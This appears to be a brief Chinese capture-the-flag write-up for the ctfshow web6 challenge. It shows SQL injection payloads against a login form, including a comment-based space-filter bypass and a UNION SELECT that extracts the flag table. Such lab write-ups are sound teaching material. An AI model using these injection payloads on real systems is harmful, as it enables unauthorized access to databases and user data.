ctfshow-web6

0x00 前言

  • CTF 加解密合集
  • CTF Web合集

0x01 题目

ctfshow-web6_第1张图片

0x02 Write Up

看到是一个登录框,所以先考虑到是sql注入。

使用通用payload进行测试

username=a' or 1=1#&password=a

发现这里出现了 sql inject error

ctfshow-web6_第2张图片
然后测试看是哪一个字符触发了,测试后发现是空格会触发这个问题

ctfshow-web6_第3张图片
那么我们可以选择使用/**/代替空格

ctfshow-web6_第4张图片

然后就是正常流程

username=a'/**/union/**/select/**/1,flag,3/**/from/**/web2.flag#&password=a

ctfshow-web6_第5张图片

以上

你可能感兴趣的:(CTF,web,web安全)